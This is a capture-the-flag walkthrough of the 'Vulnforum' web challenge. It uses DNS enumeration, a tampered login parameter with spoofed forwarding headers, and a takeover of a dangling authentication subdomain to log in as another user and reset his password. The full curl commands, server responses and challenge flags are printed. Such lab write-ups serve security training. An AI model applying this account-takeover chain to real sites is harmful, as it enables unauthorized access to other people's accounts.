Vulnforum

DNS Recon

❯ nslookup -type=any vulnforum.co.uk 8.8.8.8
Server:		8.8.8.8
Address:	8.8.8.8#53

Non-authoritative answer:
Name:	vulnforum.co.uk
Address: 68.183.255.206
vulnforum.co.uk	nameserver = ns1.digitalocean.com.
vulnforum.co.uk	nameserver = ns2.digitalocean.com.
vulnforum.co.uk	nameserver = ns3.digitalocean.com.
vulnforum.co.uk
	origin = ns1.digitalocean.com
	mail addr = hostmaster.vulnforum.co.uk
	serial = 1626253208
	refresh = 10800
	retry = 3600
	expire = 604800
	minimum = 1800

Authoritative answers can be found from:

❯ dnsrecon -d vulnforum.co.uk -D ~/Dokumente/ctfchallenge/wordlists/subdomains.txt -t brt
[*] Performing host and subdomain brute force against vulnforum.co.uk
[*] 	 A www.vulnforum.co.uk 68.183.255.206
[+] 1 Records Found

Visual Recon - Browsing the Page

Findings

Playing with Login Parameters

We open our browsers dev console and try to login using some credentials. It doesn't work but we copy the login also curl command to check it out. Change --data-raw 'username=toby&password=toby&method=local' to --data-raw 'username=toby&password=toby&method=remote'

❯ curl 'http://www.vulnforum.co.uk/login' \
  -H 'Accept: */*' \
  -H 'Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7' \
  -H 'Cache-Control: no-cache' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Cookie: ctfchallenge=CENSORED' \
  -H 'DNT: 1' \
  -H 'Origin: http://www.vulnforum.co.uk' \
  -H 'Pragma: no-cache' \
  -H 'Referer: http://www.vulnforum.co.uk/login' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'x-forwarded-for: 68.183.255.206' \
  -H 'x-originating-ip: 68.183.255.206' \
  -H 'x-remote-addr: 68.183.255.206' \
  -H 'x-remote-ip: 68.183.255.206' \
  --data-raw 'username=toby&password=toby&method=remote' \
  --compressed \
  --insecure
{"display_msg":"Server Error","technical_msg":"Server \"http:\/\/nqorl3vm.auth.vulnforum.co.uk\/auth\" responded with a 404 error","flag":"[^FLAG^D45391B42D080B1938B035A601C657B3^FLAG^]"}

We've got the first flag and an interesting URL: http://nqorl3vm.auth.vulnforum.co.uk/auth

DNS Recon - Part 2

Let's check our new domain

❯ dnsrecon -d nqorl3vm.auth.vulnforum.co.uk
[*] Performing General Enumeration of Domain: nqorl3vm.auth.vulnforum.co.uk
[!] Wildcard resolution is enabled on this domain
[!] It is resolving to vulnauth.co.uk
[!] All queries will resolve to this address!!
[-] All nameservers failed to answer the DNSSEC query for nqorl3vm.auth.vulnforum.co.uk
[*] 	 SOA ns1.digitalocean.com 173.245.58.51
[*] 	 NS ns1.digitalocean.com 173.245.58.51
[*] 	 Bind Version for 173.245.58.51 b'Salt-master'
[*] 	 NS ns1.digitalocean.com 2400:cb00:2049:1::adf5:3a33
[*] 	 NS ns3.digitalocean.com 198.41.222.173
[*] 	 Bind Version for 198.41.222.173 b'Salt-master'
[*] 	 NS ns3.digitalocean.com 2400:cb00:2049:1::c629:dead
[*] 	 NS ns2.digitalocean.com 173.245.59.41
[*] 	 Bind Version for 173.245.59.41 b'Salt-master'
[*] 	 NS ns2.digitalocean.com 2400:cb00:2049:1::adf5:3b29
[-] Could not Resolve MX Records for nqorl3vm.auth.vulnforum.co.uk
[*] 	 CNAME nqorl3vm.auth.vulnforum.co.uk vulnauth.co.uk
[*] 	 A vulnauth.co.uk 68.183.255.206
[*] Enumerating SRV Records
[-] No SRV Records Found for nqorl3vm.auth.vulnforum.co.uk
[+] 0 Records Found

We found yet another new domain: vulnauth.co.uk Let's verify if it's live

❯ curl -L -ik -H "Cookie: ctfchallenge=CENSORED" http://vulnauth.co.uk
HTTP/1.1 200 OK
server: nginx/1.21.1
date: Fri, 13 May 2022 14:16:44 GMT
content-type: text/html; charset=UTF-8
set-cookie: ctfchallenge=CENSORED; Max-Age=2592000; Path=/; domain=.vulnauth.co.uk
transfer-encoding: chunked

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>VulnAuth - Authorisation Provider</title>
    <link href="/css/bootstrap.min.css" rel="stylesheet">
</head>
<body>
<div class="container">

    <div style="text-align: center">
        <h1>VulnAuth</h1>
        <h4>User Authentication</h4>
        <img src="/images/logo.jpg">
    </div>

    <div class="row" style="margin-top:20px">

        <div class="col-md-5 col-md-offset-1">
            <h3>What is VulnAuth?</h3>
            <p>VulnAuth is a whitelabel solution to all your user authentication needs.</p>
            <p>We handle your user logins to you don't need to store any passwords on your systems.</p>
            <p>You can even use your existing domain name just by setting up a CNAME record to vulnauth.co.uk for example <strong>auth.yourdomain.com</strong></p>
            <p><strong>[^FLAG^A959EBEC1D9A02A456FC5BCCF7BA8D91^FLAG^]</strong></p>	
	</div>

We found another flag!

Subdomain Takeover

We previously found http://nqorl3vm.auth.vulnforum.co.uk/auth which tells us "Invalid Domain" when visiting the page. With the infos we gathered in our previous step it's a good idea to try to register that domain :)

Visit: http://vulnauth.co.uk/ and create an account

Auth Domain: nqorl3vm.auth.vulnforum.co.uk
E-Mail Address: toby@toby.com
Password: toby123

Visit: http://nqorl3vm.auth.vulnforum.co.uk (You should be greeted with a login page) Create a new User using the UUID we've discovered previously (1ac9c036aaf12a755084dc6a326ed7f5)

Username: toby
UUID: 1ac9c036aaf12a755084dc6a326ed7f5
Password: toby123

Let's try to login using curl

❯ curl -ik -L 'http://www.vulnforum.co.uk/login' \
  -H 'Accept: */*' \
  -H 'Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7' \
  -H 'Cache-Control: no-cache' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Cookie: ctfchallenge=CENSORED' \
  -H 'DNT: 1' \
  -H 'Origin: http://www.vulnforum.co.uk' \
  -H 'Pragma: no-cache' \
  -H 'Referer: http://www.vulnforum.co.uk/login' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'x-forwarded-for: 68.183.255.206' \
  -H 'x-originating-ip: 68.183.255.206' \
  -H 'x-remote-addr: 68.183.255.206' \
  -H 'x-remote-ip: 68.183.255.206' \
  --data-raw 'username=toby&password=toby123&method=remote' \
  --compressed \
  --insecure
HTTP/1.1 201 Created
server: nginx/1.21.1
date: Fri, 13 May 2022 14:10:48 GMT
content-type: application/json
set-cookie: ctfchallenge=CENSORED; Max-Age=2592000; Path=/; domain=.vulnforum.co.uk
set-cookie: token=NmNiMGJkOTNiY2JkNmIxYzQ1YjRlYjIwMGViNWQzYzZiN2UwZDQ4NGQyM2U5ZGZhNTFkYzY3MDI2ZDllNDdmYTdlNjJhMTExNzcyYTVkYjBkMjc2MDhmNGMxZDJjOTk1OGU0NmRhNGFkOGFiZTU4M2FkMDAzNzNiNWVjNDVjMWE%3D; expires=Fri, 13-May-2022 15:10:48 GMT; Max-Age=3600; path=/
transfer-encoding: chunked

{"display_msg":"Login Successful","technical_msg":"","flag":"[^FLAG^D45391B42D080B1938B035A601C657B3^FLAG^]"}

Great it worked!

Visual Recon - Browsing the Page - As User: Toby

Unfortunately we aren't able to login on the webpage itself due to the "method=local" that is hardcoded. Lets use the cookie we've generated earlier and import it in our browser

Great! We're logged in as toby and find another flag [^FLAG^3B1A170C3033B788FEB1B1A4E45D62CD^FLAG^]

Findings

Visit: http://www.vulnforum.co.uk/settings We're resetting the password to toby123 and now are able to login without any problems.

Last updated